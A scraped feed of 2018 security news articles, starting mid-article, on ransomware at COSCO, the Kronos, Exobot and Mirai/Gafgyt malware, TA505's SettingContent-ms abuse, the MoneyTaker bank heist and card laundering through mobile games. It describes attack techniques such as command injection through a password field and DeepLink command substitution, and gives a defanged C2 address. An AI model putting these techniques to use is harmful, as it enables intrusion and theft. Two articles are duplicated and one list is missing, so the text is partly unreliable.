“So far, all vessels of our company are operating normally, and our main business operation systems are stable. We are glad to inform you that we have taken effective measures and aside from the Americas region, the business operation within all other regions will be recovered very soon. The business operations in the Americas are still being carried out, and we are trying our best to make a full and quick recovery,”

The Journal of Commerce, citing COSCO Vice President Howard Finkel, reported communications between the carrier’s U.S. operations and its customers has been slowed due to the cyber attack. Digital communications were disrupted and the communications were going on via telephone.

Port of Long Beach spokesman Lee Peterson confirmed the attack and added that it is monitoring the situation.

According to the popular security expert Kevin Beaumont‏, the ransomware has infected a portion of the infrastructure that hosts the company website (cosco-usa.com), phone and email systems, and WAN and VPN gateways.

At the time of writing the affected U.S. systems still appear to be offline.

The good news is that the attack doesn’t appear severe as the NotPetya attack that hit shipping giant Maersk in August 2017.

According to the second quarter earnings report, there were expecting losses between $200 million and $300 million due to “significant business interruption” because the company was forced to temporarily halt critical systems infected with the ransomware.

Møller-Maersk chair Jim Hagemann Snabe during a speech at the World Economic Forum explained that the attack forced the IT staff to reinstall “4,000 new servers, 45,000 new PCs, and 2,500 applications,” practically “a complete infrastructure.”

Pierluigi Paganini

(Security Affairs – COSCO,  Ransomware)

The post Ransomware attack disrupted some systems of the shipping giant COSCO in the US appeared first on Security Affairs.

Kronos Banking Trojan resurrection, new campaigns spotted in the wild

Researchers from Proofpoint have discovered a new variant of the infamous Kronos banking Trojan that was involved in several attacks in the recent months.

The infamous Kronos banking Trojan is back, and according to the experts from Proofpoint it was involved in several attacks in the last months.

The malware was first spotted in 2014 by researchers at security firm Trusteer that discovered an adv on the Russian underground market regarding a new financial Trojan dubbed Kronos.

 Kronos banking trojan

The new variant was discovered in at least three distinct campaigns targeting Germany, Japan, and Poland respectively.

The new variants share many similarities with older versions:

  • Extensive code overlap
  • Same Windows API hashing technique and hashes
  • Same string encryption technique
  • Extensive string overlap
  • Same C&C encryption mechanism
  • Same C&C protocol and encryption
  • Same webinject format (Zeus format)
  • Similar C&C panel file layout

“Some of the features highlighted in the ad (written in C++, banking Trojan, uses Tor, has form grabbing and keylogger functionality, and uses Zeus-formatted webinjects) overlap with features we observed in this new version of Kronos.” continues the analysis.

“The ad mentions the size of the bot to be 350 KB which is very close to the size (351 KB) of an early, unpacked sample of the new version of Kronos we found in the wild [8]. This sample was also named “os.exe” which may be short for “Osiris”.”

Since April 2018, experts discovered new samples of a new variant of the Kronos banking Trojan in the wild. The most important improvement is represented by the command and control (C&C) mechanism that leverages the Tor anonymizing network.

“There is some speculation and circumstantial evidence suggesting that this new version of Kronos has been rebranded “Osiris” and is being sold on underground markets.” states the analysis published by Proofpoint.

A first campaign was observed on June 27, the malware was targeting German users with weaponized documents attached to spam emails. The macros included in the document was used as downloader for the payload, in some cases, the SmokeLoader downloader.

A second campaign was uncovered on July 13, the victims were infected through a malvertising campaign. The malicious ads pointed out to a website that thanks to JavaScript injections redirected visitors to the RIG exploit kit, that delivered SmokeLoader. The downloader would deliver the Kronos onto the compromised machines.

A third campaign was observed since July 15 and sees victims receiving fake invoice emails carrying weaponized documents that attempted to exploit the CVE-2017-11882 vulnerability to deliver and execute the Kronos Trojan.

The experts highlighted that the malware leveraged webinjects in the German and Japanese campaigns, but they weren’t involved in the attacks on Poland.

The fourth campaign started on July 20 and according to the experts it is still ongoing.

“The reappearance of a successful and fairly high-profile banking Trojan, Kronos, is consistent with the increased prevalence of bankers across the threat landscape.” Proofpoint concludes.

“While there is significant evidence that this malware is a new version or variant of Kronos, there is also some circumstantial evidence suggesting it has been rebranded and is being sold as the Osiris banking Trojan,”

Pierluigi Paganini

Security Affairs –  (Kronos, banking)

The post Kronos Banking Trojan resurrection, new campaigns spotted in the wild appeared first on Security Affairs.

New variant of Kronos banking trojan spotted using Tor network

By Waqas

WannaCry ransomware hero is facing charges in the United States for developing Kronos banking trojan. In August 2017, Marcus Hutchins (@MalwareTechBlog on Twitter) aka WannaCry ransomware hero was arrested in the United States by the FBI and charged with playing a vital role in the development of Kronos banking Trojan. He is still in the States facing Federal […]

This is a post from HackRead.com Read the original post: New variant of Kronos banking trojan spotted using Tor network

How Blockchain Ecosystems Can Be a Threat to Cybersecurity

The first impression of many people about blockchain technology is that it will actually enhance cybersecurity. The reason for this point of view is because of the structure of blockchain

The post How Blockchain Ecosystems Can Be a Threat to Cybersecurity appeared first on The Cyber Security Place.

The Death botnet grows targeting AVTech devices with a 2-years old exploit

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.

A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-years old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many products of the vendor currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of payload used by EliteLands is adding accounts with a lifespan of five minutes that execute his payload and then is deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted the EliteLands who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was orginally just to ddos but I have a greater plan on it soon. I dont really use it for attacks only to get customers aware of the power it has.”

Stay tuned.

Pierluigi Paganini

(Security Affairs – Death botnet,  hacking)

The post The Death botnet grows targeting AVTech devices with a 2-years old exploit appeared first on Security Affairs.

Security Affairs: The Death botnet grows targeting AVTech devices with a 2-years old exploit

A new botnet, tracked as Death botnet has appeared in the threat landscape and is gathering unpatched AVTech devices with an old exploit.

A new botnet, tracked as ‘Death botnet,’ has appeared in the threat landscape, its author that goes online with the moniker EliteLands is gathering unpatched AVTech devices in the malicious infrastructure.

AVTech is one of the world’s leading CCTV manufacturers, it is the largest public-listed company in the Taiwan surveillance industry.

EliteLands is using a 2-years old exploit that could be used to trigger tens of well-known vulnerabilities in the AVTech firmware. Many products of the vendor currently run the vulnerable firmware, including DVRs, NVRs, and IP cameras.

The security expert Ankit Anubhav who discovered the Death botnet revealed that outdated firmware versions expose the passwords of the AVTech device in cleartext. The flaw could be exploited by an unauthenticated attacker to add users to existing devices.

Ankit Anubhav told Bleeping Computer that EliteLands is exploiting the issues to add new users to AVTech devices.

The expert explained that older firmware is vulnerable to a command injection vulnerability for the password field, this means that the attacker can provide a shell command in this field to get it executed and take over the devices.

“So, if I put reboot as password, the AVTech system gets rebooted,” Anubhav explained. “Of course, the Death botnet is doing much more than just rebooting.”

AVTech rolled out security updates for the flaw at the beginning of 2017, but evidently many devices are still running old firmware. Recently, another botnet, the Hide ‘N Seek (HNS) botnet, started leveraging the same issue ((new) AVTECH RCE) to target IoT devices.

At the end of June, AVTech published a security alert regarding the attacks exploiting the above flaw.

Anubhav confirmed that EliteLands gathering devices for his Death botnet by targeting exposed devices with different payloads for the password field.

The latest version of payload used by EliteLands is adding accounts with a lifespan of five minutes that execute his payload and then is deleted from the device.

“This is like a burner account,” Anubhav told Bleeping Computer. “Usually people don’t make new user accounts with access of only 5 minutes.”

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted the EliteLands who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was orginally just to ddos but I have a greater plan on it soon. I dont really use it for attacks only to get customers aware of the power it has.”

Stay tuned.

Pierluigi Paganini

(Security Affairs – Death botnet,  hacking)

The post The Death botnet grows targeting AVTech devices with a 2-years old exploit appeared first on Security Affairs.



Security Affairs

Cryptomining Replaces Ransomware as Most Popular Cybercrime Malware

Skybox® Security, a global leader in cybersecurity management, announced today the release of its mid-year update to the Vulnerability and Threat Trends Report which analyzes vulnerabilities, exploits and threats in play. The report,

The post Cryptomining Replaces Ransomware as Most Popular Cybercrime Malware appeared first on The Cyber Security Place.

Experts warn of new campaigns leveraging Mirai and Gafgyt variants

Security experts are warning of an intensification of attacks powered by two notorious IoT botnets, Mirai and Gafgyt.

Security experts are warning of a new wave of attacks powered by two botnets, Mirai and Gafgyt.

Since the code of the infamous Mirai botnet was leaked online many variants emerged in the threat landscape. Satori, Masuta, Wicked Mirai, JenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

The Gafgyt botnet, also known as Bashlite and Lizkebab, first appeared in the wild in 2014 had its source code was leaked in early 2015.

In September 2016, a joint research conducted by Level 3 Communications and Flashpoint allowed the identification of a million devices infected by the BASHLITE malware.

“The end of May 2018 has marked the emergence of three malware campaigns built on publicly available source code for the Mirai and Gafgyt malware families that incorporate multiple known exploits affecting Internet of Things (IoT) devices.” reads the analysis published by PaloAlto Network. 

“Samples belonging to these campaigns incorporate as many as eleven exploits within a single sample, beating the IoT Reaper malware, which borrowed some of the Mirai source code but also came with an integrated LUA environment that incorporated nine exploits in its code.”

The latest variants of both bots include the code to target the D-Link DSL-2750B OS Command Injection flaw, experts noticed that the new feature was implemented only a few weeks after the publication of the Metasploit module for its exploitation on May 25.

According to the experts, the two attacks appear to be linked.

The first campaign spotted by the experts is associated with the Omni bot that is one of the latest variants of the Mirai malware. The Omni bot includes a broad range of exploits such the code to trigger two vulnerabilities (CVE-2018-10561 and CVE-2018-1562) in Dasan GPON routers, a flaw in Huawei router tracked as CVE-2017–17215, two command execution issues in D-Link devices, vulnerabilities in Vacron NVR devices, a remote code execution in CCTVs and DVRs from over 70 vendors, a JAWS Webserver command execution.

“All of these vulnerabilities are publicly known and have been exploited by different botnets either separately or in combination with others in the past, however, this is the first Mirai variant using all eleven of them together.” continues the report published by PaloAlto.

The campaign leverages two different encryption schemes, the bot propagates only via exploits and prevents further infection of compromised devices through dropping packets received on certain ports using iptables.

The last variant of Mirai uses the IP 213[.]183.53.120 for both for serving payloads and as a Command and Control (C2) server, the same address was also used by some Gafgyt samples.

A second campaign observed by the researchers was using the same exploits of the previous one but also attempted to carry on credential brute force attacks.

The campaign was tracked as Okane by the name of the binaries downloaded by the shell script to replicate itself.

“Unlike the previous campaign, these samples also perform a credential brute force attack.” continues the analysis. 

“Some unusual entries were discovered on the brute force lists in these samples, such as the following:

Some samples belonging to this campaign include the addition of two new DDoS methods to the Mirai source code.”

mirai okane

Experts at PaloAlto Networks observed a third campaign, tracked as Hakai, that was attempting to infect devices with the Gafgyt malware by using all the previous exploits code, except for the UPnP SOAP TelnetD Command Execution exploit.

Further details about the campaigns, including IoCs are included in the post published by PaloAlto.

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Experts warn of new campaigns leveraging Mirai and Gafgyt variants appeared first on Security Affairs.

Uber driver recorded passengers & live-streamed videos on Twitch

By Carolina

What is shocking about this incident is that what the Uber driver did was legal under Missouri law. Jason Gargac, an Uber and Lyft driver from St Louis Missouri, USA recorded and live-streamed his passengers’ activities on the video-sharing website Twitch, without their consent and knowledge. The videos displayed activities of passengers in the vehicle including personal conversations […]

This is a post from HackRead.com Read the original post: Uber driver recorded passengers & live-streamed videos on Twitch

The source code of the Exobot Android banking trojan has been leaked online

The source code of the Exobot Android banking trojan has been leaked online, researchers already verified its authenticity.

The source code of the Exobot Android banking trojan has been leaked online and experts believe that we will soon assist at a new wave of attacks based on the malware.

The Exobot Android banking trojan was first spotted at the end of 2016 when its authors were advertising it on the dark web.

The authors were advertising it saying that it can be used for phishing attacks, it implements various features of most common banking Trojan such as intercepting SMS messages.

Exobot is a powerful banking malware that is able of infecting even smartphones running the latest Android versions.

In January, the authors decided to stop working at the malware and offered for sale its source code.

Now researchers from Bleeping Computer confirmed to have received a copy of the source code from an unknown individual and shared it with malware researchers from ESET and ThreatFabric in order to verify its authenticity.

“The code proved to be version 2.5 of the Exobot banking trojan, also known as the “Trump Edition,” one of Exobot’s last version before its original author gave up on its development.” reads a blog post published by Bleeping Computer.

Exobot Android banking trojan

According to experts from ThreatFabric the version provided to Bleeping Computer was leaked online in May. It seems that one of the users that purchased the malicious code decided to leak it online.

According to the experts, the source code for the Exobot Android banking Trojan is now being distributed on a few underground hacking forums, this means that threat actors can now work on their own version and also offer it with a malware-as-a-service model.

“In the coming months, we may see Android malware devs slowly migrating their campaigns from BankBot to Exobot, as few will decline a “free upgrade” to a better code.” concluded Bleeping Computers.

Pierluigi Paganini

(Security Affairs – Android,  banking Trojan)

The post The source code of the Exobot Android banking trojan has been leaked online appeared first on Security Affairs.

TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT

Proofpoint uncovered a massive malspam campaign leveraging emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Security experts from Proofpoint have uncovered a massive malspam campaign, crooks sent hundreds of thousands of emails delivering weaponized PDF documents containing malicious SettingContent-ms files.

Experts attributed the malspam campaign to the cybercriminal group tracked as TA505, the attackers are spreading the FlawedAmmyy RAT.

The SettingContent-ms file format was implemented in Windows 10 to allows a user to create “shortcuts” to various Windows 10 setting pages.

Thi file opens the Control Panel for the user [control.exe], experts noticed that it includes the  <DeepLink> element in the schema.

SettingContent-ms files

This element takes any binary with parameters and executes it, this means that an attacker can substitute ‘control.exe’ with a malicious script that could execute any command, including cmd.exe and PowerShell, without user interaction.

“After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries.” wrote experts from Specterops.

“The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?”

Experts noticed that maliciously SettingContent-ms file can bypass Windows 10 security mechanisms such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.

In June experts from SpecterOps monitored several campaigns abusing the SettingContent-ms file format within Microsoft Word documents, but only a few days ago Proofpoint experts noticed threat actors leveraging PDF documents.

“Colleagues at SpecterOps recently published research[1] on abuse of the SettingContent-ms file format. Crafted SettingContent-ms files can be used to bypass certain Windows 10 defenses such as Attack Surface Reduction (ASR) and detection of OLE-embedded dangerous file formats.” reads the analysis published by Proofpoint.

“We first observed an actor embedding SettingContent-ms inside a PDF on June 18. However, on July 16 we observed a particularly large campaign with hundreds of thousands of messages attempting to deliver PDF attachments with an embedded SettingContent-ms file.”

SettingContent-ms files campaign

 

Once the victim has opened the PDF file, Adobe Reader will display a warning message asking the user if they want to open the file, since it is attempting to run the embedded “downl.SettingContent-ms” via JavaScript. Experts noticed that the warning message is displayed for any file format embedded within a PDF, not only for SettingContent-ms files.

If the victim clicks the “OK” prompt, the PowerShell command included in the <DeepLink> element downloads and execute the FlawedAmmyy RAT.

The FlawedAmmyy RAT has been active since 2016, it borrows the code of the Ammyy Admin remote access Trojan.

FlawedAMMYY implements common backdoor features, it allows attackers to manage files, capture the screen, remote control the machine, establish RDP SessionsService, and much more.

Experts attributed the malspam campaign to the TA505  threat actor based on email messages, as well as the payload.

The TA505 operates on a large scale, it was behind other major campaigns leveraging the Necurs botnet to deliver other malware, including the Locky ransomware, the Jaff ransomware, and the Dridex banking Trojan.

“Whether well established (like TA505) or newer to the space, attackers are quick to adopt new techniques and approaches when malware authors and researchers publish new proofs of concept. While not all new approaches gain traction, some may become regular elements through which threat actors rotate as they seek new means of distributing malware or stealing credentials for financial gain.” concludes Proofpoint researchers, “In this case, we see TA505 acting as an early adopter, adapting the abuse of SettingContent-ms files to a PDF-based attack delivered at significant scale.”

Pierluigi Paganini

(Security Affairs – TA505 ,  SettingContent-ms file)

The post TA505 gang abusing PDF files embedding SettingContent-ms to distribute FlawedAmmyy RAT appeared first on Security Affairs.

Hackers attack Russian bank to steal $1m using an outdated router

By Waqas

Cybercriminals part of a notorious hacking group attacked the PIR Bank of Russia and stole $1m. The hacking was carried out after infiltrating the bank’s systems by compromising an old, outdated router. The router was installed at one of the regional branches of the bank. The money was stolen via the Automated Workstation Client (AWC) […]

This is a post from HackRead.com Read the original post: Hackers attack Russian bank to steal $1m using an outdated router

MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank

The cybersecurity firm Group-IB is involved in the incident response on an attack on the Russian PIR Bank conducted by MoneyTaker hacking group.

MoneyTaker hacker group has stolen 1 million US dollars from the Russian bank, the cyber heist occurred on July 3 through the Russian Central Bank’s Automated Workstation Client (an interbank fund transfer system similar to SWIFT).

Crooks transferred the money to 17 accounts at major Russian banks and cashed out, then tried to ensure persistence in the bank’s network for later attacks. The bank hired Group-IB in order to respond to the incident and limit the damages.

According to Kommersant newspaper, the MoneyTaker hacking group stole around $920,000 (which is a conservative estimate) from the Russian bank. The PIR Bank officially confirmed the attack, but it was unable to determine the exact amount of money stole by the attackers.

Even if the bank managed to delay the withdrawal of the stolen funds, most of them are lost. 

“During the incident, Group-IB specialists established the source of the attack, built a chain of events, and isolated the problem as soon as it was feasible. At the moment, the bank is operating normally, all Group-IB recommendations are applied and will be applied to the bank’s operations in the future in order to prevent new similar incidents,” said Olga Kolosova, Chairperson of the Management Board of PIR Bank LLC.

Forensics analysis of workstations and servers at the bank revealed that the attack was launched by the MoneyTaker hacker group. The hackers used specific tools and techniques that had been used earlier by MoneyTaker in previous attacks on financial institutions. The experts also noticed that the IP addresses of their C&C servers were the same used in previous attacks.

MoneyTaker is a cybercrime gang specialized in targeted attacks on financial institutions, in December 2017 Group-IB published a detailed report on its activity (MoneyTaker: 1.5 Years of Silent Operations). The group is focused on card processing and interbank transfer systems (AWS CBR and SWIFT).

MoneyTaker hacker group

The MoneyTaker group has been active at least since spring 2016 when they stole money from a U.S. bank after gaining access to the card processing system (FirstData’s STAR processing system). After that, the hackers went in the dark for almost 4 months and only attacked banks in Russia in September 2016.

Group-IB recorded 10 MoneyTaker attacks against organizations in the U.S., UK, and Russia. Since 2017, the group restricted the geography of the attacks to Russia and the U.S.

In 2018, Group-IB tracked two MoneyTaker attacks in Russia. 

“MoneyTaker has its own set of specific TTPs. The hackers try to go unnoticed, use ‘one-time’ infrastructure, ‘fileless’ software and carefully cover up traces of their presence. This involves specific usages of Metasploit and PowerShell Empire frameworks.” states Group-IB.

Back to the PIR Bank attack, Group-IB confirmed that the attack on PIR Bank started in late May 2018. Hackers gained access to the bank by compromising router used by one of the bank’s regional branches.

“The router had tunnels that allowed the attackers to gain direct access to the bank’s local network. This technique is a characteristic of MoneyTaker. This scheme has already been used by this group at least three times while attacking banks with regional branch networks.” reads the press release published by Group-IB.

MoneyTaker group use PowerShell scripts to establish persistence in the banks’ systems and automate some stages of their attack. Once the crooks have hacked the bank’s main network, they managed to gain access to AWS CBR (Automated Work Station Client of the Russian Central Bank) to generate payment orders and send money in several tranches to mule accounts prepared in advance.

On the evening of July 4, bank IT staff discovered the unauthorized transactions with large sums, it quickly asked the regulator to block the AWS CBR digital signature keys, but it was not possible to stop the financial transfers in time.

Most of the stolen money was transferred to cards of the 17 largest banks on the same day and immediately cashed out by money mules involved in the final stage of money withdrawal from ATMs.

MoneyTaker hackers cleared OS logs on many computers, which was meant to hinder the response to the incident and its subsequent investigation, a technique already observed in other attacks.

“Moreover, the criminals left some so-called ‘reverse shells’, programs that connected the hackers’ servers from the bank’s network and waited for new commands to conduct new attacks and gain the access to the network. During incident response this was detected by Group-IB employees and removed by the bank’s sysadmins.”  added Group-IB.

This is not the first successful attack on a Russian bank with money withdrawal since early 2018,” says Valeriy Baulin, Head of Digital Forensics Lab Group-IB, We know of at least three similar incidents, but we cannot disclose any details before our investigations are completed. As for withdrawal schemes, each group specializing in targeted attacks – Cobalt, Silence and MoneyTaker (these have been the most active groups in 2018) – have their own scheme depending on the amounts and cashout scenarios. We should understand that attacks on AWS CBR are difficult to implement and are not conducted very often, because many hackers just cannot ‘work on computers with AWS CBR’ successfully. A 2016 incident, when МoneyTaker hackers withdrew about $2 million using their own self-titled program, remains one of the largest attacks of this kind.”

Pierluigi Paganini

(Security Affairs – MoneyTaker hacking group, cybercrime)

The post MoneyTaker hacking group stole 1 million US dollars from Russian PIR Bank appeared first on Security Affairs.

Security Affairs: How crooks conduct Money Laundering operations through mobile games

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.

A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice, the investigation started in mid-June when the experts from Kromtech Security discovered a MongoDB database exposed online. The database was containing information related to carders’ activities, the database contained 150,833 unique cards records (card number, expiration date, and CCV)

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is simple as effective. Crooks used a special tool to create iOS accounts using valid emails accounts, then they associated with the accounts the stolen payment cards. Most of the created accounts are specific to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then made the jailbreaking of iOS devices to install various games, create in-game accounts, and use them to purchase game features or premiums.

The cash out was made later when crooks re-sold the game features or premiums online for real money.

Experts found credit cards belong to 19 different banks, they speculated they were probably bought on the specific carder markets where they were offered in groups of 10k, 20k, 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue.  Associated third-party markets are very active, websites like g2g.com to allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.

money laundering games

“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App Offered by Android Users Release Metacritic score In-app Products price per item Daily revenue $

Yearly revenue

()

Clash of Clans Supercell 100 000 000+ 2012 74/100 $0.99 – $99.99 per item 684 002 250M
Clash Royale Supercell 100 000 000+ 2016 86/100 $0.99 – $99.99 per item 153 150 56M
Marvel Contest of Champions Kabam 50 000 000+ 2014 76/100 $0.99 – $99.99 per item 64 296 23.5M

The experts also found that the Apple was employing lax credit card verification process when users add payment card data to iOS accounts, advantaging fraudulent activities. The experts noticed that cards with improper names and addresses were approved by Apple, for this reason, they notified their discovery to Apple.

The experts also highlighted that game makers do not implement necessary measures to prevent such kind of abuses. For example, the game makers do not control the interaction of tools like Racoonbot with Supercell games that are used to automate the premium feature buying operations.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans.  It advertises itself in it’s forum as a way to “Become rich at Clash of the Clans”.  This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards.  It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

iGameSupply is an approved marketplace for selling Racoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/

Pierluigi Paganini

(Security Affairs – gaming, money laundering)

The post How crooks conduct Money Laundering operations through mobile games appeared first on Security Affairs.



Security Affairs

How crooks conduct Money Laundering operations through mobile games

Experts uncovered a money laundering ring that leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards.

A money laundering ring leverages fake Apple accounts and gaming profiles to make transactions with stolen payment cards and then sells these game premiums on online forums and within gaming communities.

The money laundering operation was unveiled by the US Department of Justice, the investigation started in mid-June when the experts from Kromtech Security discovered a MongoDB database exposed online. The database was containing information related to carders’ activities, the database contained 150,833 unique cards records (card number, expiration date, and CCV)

“Following our MongoDB investigations and honey pots deployments from the beginning of this year, we did another round of security audit of unprotected MongoDB instances. In June 2018 we have spotted a strange database publicly exposed to the public internet (no password/login required) along with a large number of credit card numbers and personal information inside.” reads the blog post published by Kromtech Security.

“As we examined the database we rapidly became aware that this was not your ordinary corporate database, this database appeared to belong to credit card thieves (commonly known as carders) and that it was relatively new, only a few months old. So we dug much deeper.”

The activity of the criminal gang behind the operation is simple as effective. Crooks used a special tool to create iOS accounts using valid emails accounts, then they associated with the accounts the stolen payment cards. Most of the created accounts are specific to users located in Saudi Arabia, India, Indonesia, Kuwait, and Mauritania.

The group then made the jailbreaking of iOS devices to install various games, create in-game accounts, and use them to purchase game features or premiums.

The cash out was made later when crooks re-sold the game features or premiums online for real money.

Experts found credit cards belong to 19 different banks, they speculated they were probably bought on the specific carder markets where they were offered in groups of 10k, 20k, 30k.

The list of mobile games used by the cybercriminals includes popular apps such as Clash of Clans and Clash Royale developed by Supercell, and Marvel Contest of Champions developed by Kabam.

The three apps have a gaming community of over 250 million users and generate approximately $330 million USD a year in revenue.  Associated third-party markets are very active, websites like g2g.com to allow gamers to buy and sell resources and games, a great opportunity for crooks involved in money laundering.

money laundering games

“It is interesting to note that these three games are not even in the top five games. Scaling this scheme across other popular apps and games with in-app purchases places the potential market well into the billions of dollars USD per year.” reported Kromtech Security.

App Offered by Android Users Release Metacritic score In-app Products price per item Daily revenue $

Yearly revenue

()

Clash of Clans Supercell 100 000 000+ 2012 74/100 $0.99 – $99.99 per item 684 002 250M
Clash Royale Supercell 100 000 000+ 2016 86/100 $0.99 – $99.99 per item 153 150 56M
Marvel Contest of Champions Kabam 50 000 000+ 2014 76/100 $0.99 – $99.99 per item 64 296 23.5M

The experts also found that the Apple was employing lax credit card verification process when users add payment card data to iOS accounts, advantaging fraudulent activities. The experts noticed that cards with improper names and addresses were approved by Apple, for this reason, they notified their discovery to Apple.

The experts also highlighted that game makers do not implement necessary measures to prevent such kind of abuses. For example, the game makers do not control the interaction of tools like Racoonbot with Supercell games that are used to automate the premium feature buying operations.

“Raccoonbot.com is an automated bot dedicated to Supercell’s Clash of the Clans.  It advertises itself in it’s forum as a way to “Become rich at Clash of the Clans”.  This is done by automating the game and selling the gems. It can potentially be used in conjunction with MaxTooliOS to further enhance the profit from the stolen credit cards.  It’s a direct violation of Supercell policy, it aids in laundering money, and it also remains in operation.” continues the analysis.

iGameSupply is an approved marketplace for selling Racoonbot generated gems https://www.raccoonbot.com/forum/forum/80-approved-marketplace/

Pierluigi Paganini

(Security Affairs – gaming, money laundering)

The post How crooks conduct Money Laundering operations through mobile games appeared first on Security Affairs.

How the Rise of Cryptocurrencies Is Shaping the Cyber Crime Landscape: The Growth of Miners

Introduction

Cyber criminals tend to favor cryptocurrencies because they provide a certain level of anonymity and can be easily monetized. This interest has increased in recent years, stemming far beyond the desire to simply use cryptocurrencies as a method of payment for illicit tools and services. Many actors have also attempted to capitalize on the growing popularity of cryptocurrencies, and subsequent rising price, by conducting various operations aimed at them. These operations include malicious cryptocurrency mining (also referred to as cryptojacking), the collection of cryptocurrency wallet credentials, extortion activity, and the targeting of cryptocurrency exchanges.

This blog post discusses the various trends that we have been observing related to cryptojacking activity, including cryptojacking modules being added to popular malware families, an increase in drive-by cryptomining attacks, the use of mobile apps containing cryptojacking code, cryptojacking as a threat to critical infrastructure, and observed distribution mechanisms.

What Is Mining?

As transactions occur on a blockchain, those transactions must be validated and propagated across the network. As computers connected to the blockchain network (aka nodes) validate and propagate the transactions across the network, the miners include those transactions into "blocks" so that they can be added onto the chain. Each block is cryptographically hashed, and must include the hash of the previous block, thus forming the "chain" in blockchain. In order for miners to compute the complex hashing of each valid block, they must use a machine's computational resources. The more blocks that are mined, the more resource-intensive solving the hash becomes. To overcome this, and accelerate the mining process, many miners will join collections of computers called "pools" that work together to calculate the block hashes. The more computational resources a pool harnesses, the greater the pool's chance of mining a new block. When a new block is mined, the pool's participants are rewarded with coins. Figure 1 illustrates the roles miners play in the blockchain network.


Figure 1: The role of miners

Underground Interest

FireEye iSIGHT Intelligence has identified eCrime actor interest in cryptocurrency mining-related topics dating back to at least 2009 within underground communities. Keywords that yielded significant volumes include miner, cryptonight, stratum, xmrig, and cpuminer. While searches for certain keywords fail to provide context, the frequency of these cryptocurrency mining-related keywords shows a sharp increase in conversations beginning in 2017 (Figure 2). It is probable that at least a subset of actors prefer cryptojacking over other types of financially motivated operations due to the perception that it does not attract as much attention from law enforcement.


Figure 2: Underground keyword mentions

Monero Is King

The majority of recent cryptojacking operations have overwhelmingly focused on mining Monero, an open-source cryptocurrency based on the CryptoNote protocol, as a fork of Bytecoin. Unlike many cryptocurrencies, Monero uses a unique technology called "ring signatures," which shuffles users' public keys to eliminate the possibility of identifying a particular user, ensuring it is untraceable. Monero also employs a protocol that generates multiple, unique single-use addresses that can only be associated with the payment recipient and are unfeasible to be revealed through blockchain analysis, ensuring that Monero transactions are unable to be linked while also being cryptographically secure.

